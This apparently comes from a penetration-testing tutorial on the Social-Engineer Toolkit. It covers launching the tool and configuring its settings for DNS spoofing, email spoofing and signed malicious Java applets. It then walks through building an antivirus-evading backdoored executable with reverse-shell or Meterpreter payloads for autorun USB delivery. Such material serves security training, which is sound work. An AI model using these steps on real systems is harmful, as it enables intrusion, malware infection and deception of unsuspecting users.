1. Getting started with Social Engineering Toolkit (SET)

To launch SET on BackTrack, start the terminal window and pass the following path:
root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set
Copyright 2012, The Social-Engineer Toolkit (SET)
All rights reserved.
Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit
-----------------------------------------------------------------------------

2. Working with SET config file

To launch the config file, move to config and open the set_config file.
root@bt:/pentest/exploits/set# nano config/set_config


# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
The first configuration setting is related to the Metasploit installation directory. 
Metasploit is required by SET for proper functioning as it picks up payloads and 
exploits from the framework.
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

Ettercap is a multipurpose sniffer for switched LAN. Ettercap section can be used to perform LAN attacks like DNS poisoning, spoofing etc. The above SET setting can be used to either set ettercap ON of OFF depending upon the usability. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work 
only if the target's e-mail server does not implement reverse lookup. By default, its value 
is set to OFF.
The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack.
 # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL --->  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
We will discuss this attack vector in a detail in later recipe. This attack vector will also 
require JDK to be installed on your system. Let us set its value to ON as we will be discussing 
this attack in detail:
SELF_SIGNED_APPLET=ON

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using a NAT/Port forwarding and allows you to connect to the external internet.
The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance:
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
The following setting is used to set up the SSL certificate while performing web attacks. 
Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. 
So, it is recommended to keep this flag OFF:
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH 
WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
The following setting can be used to build a self-signed certificate for web attacks but there will be a warning message saying "Untrusted certificate". Hence, it is recommended to use 
this option wisely to avoid alerting the target user:
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
The following setting is used to enable or disable the Metasploit listener once the attack 
is executed:
# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
AUTOMATIC_LISTENER=ON
The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET 
in order to increase the penetration testing performance.
# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
# OR THE OTHER ATTACK VECTORS.
METASPLOIT_MODE=ON
These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the Social Engineer Toolkit.
----------------------------------------------------------------------------------

3. Infectious media generator

This attack vector is based on a simple principle of generating a malicious executable, 
and then encoding it with available encoders so as to bypass antivirus protection.
Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable              Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
[*] The payload can be found in the SET home directory.

[*] Do you want to start the listener now? yes or no: yes
[*] Please wait while the Metasploit listener is loaded...

